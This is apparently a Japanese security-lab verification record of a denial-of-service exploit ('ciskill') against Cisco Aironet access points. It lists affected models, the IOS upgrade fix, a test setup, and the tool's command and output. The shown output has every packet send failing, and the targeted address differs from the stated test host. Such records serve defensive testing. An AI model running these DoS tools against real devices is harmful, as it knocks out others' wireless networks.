【Exploit】Aironet Wireless Access Points DoS

■影響

対象システムでの検証未、影響不明

以下、対象システム
* Cisco Aironet 1400 Series Wireless Bridges
* Cisco Aironet 1300 Series Access Points
* Cisco Aironet 1240AG Series Access Points
* Cisco Aironet 1230AG Series Access Points
* Cisco Aironet 1200 Series Access Points
* Cisco Aironet 1130AG Series Access Points
* Cisco Aironet 1100 Series Access Points
* Cisco Aironet 350 Series Access Points (running IOS)


対策
Upgrade to Cisco IOS version 12.3-7-JA2. For more information see: http://www.cisco.com/public/sw-center/sw-wireless.shtml


■検証環境

・攻撃元:192.168.221.110 Linux

・攻撃対象:192.168.221.180 Win2K


■実証コード

[root@linux iss]# ./ciskill 192.168.221.1
CisKill -- Aironet Cisco Killer
Coded by: Pasv
Discovery credit: Eric Smith
Using device: 192.168.221.1

Press ctrl+c immediately if you wish to stop
Going in 5
4
3
2
1!
#:-1073742290 bytes sent: -1 (should be 42)
#:-1073742289 bytes sent: -1 (should be 42)
#:-1073742288 bytes sent: -1 (should be 42)
#:-1073742287 bytes sent: -1 (should be 42)
#:-1073742286 bytes sent: -1 (should be 42)
#:-1073742285 bytes sent: -1 (should be 42)
#:-1073742284 bytes sent: -1 (should be 42)
#:-1073742283 bytes sent: -1 (should be 42)
#:-1073742282 bytes sent: -1 (should be 42)
#:-1073742281 bytes sent: -1 (should be 42)
#:-1073742280 bytes sent: -1 (should be 42)
#:-1073742279 bytes sent: -1 (should be 42)
#:-1073742278 bytes sent: -1 (should be 42)
#:-1073742277 bytes sent: -1 (should be 42)
#:-1073742276 bytes sent: -1 (should be 42)
#:-1073742275 bytes sent: -1 (should be 42)
#:-1073742274 bytes sent: -1 (should be 42)
#:-1073742273 bytes sent: -1 (should be 42)
#:-1073742272 bytes sent: -1 (should be 42)
#:-1073742271 bytes sent: -1 (should be 42)
#:-1073742270 bytes sent: -1 (should be 42)
#:-1073742269 bytes sent: -1 (should be 42)
#:-1073742268 bytes sent: -1 (should be 42)
#:-1073742267 bytes sent: -1 (should be 42)
#:-1073742266 bytes sent: -1 (should be 42)
#:-1073742265 bytes sent: -1 (should be 42)
#:-1073742264 bytes sent: -1 (should be 42)
#:-1073742263 bytes sent: -1 (should be 42)
#:-1073742262 bytes sent: -1 (should be 42)
#:-1073742261 bytes sent: -1 (should be 42)
#:-1073742260 bytes sent: -1 (should be 42)
#:-1073742259 bytes sent: -1 (should be 42)
#:-1073742258 bytes sent: -1 (should be 42)
#:-1073742257 bytes sent: -1 (should be 42)


■Proveintaでの検知結果

N/A


■Snort

N/A


■パケット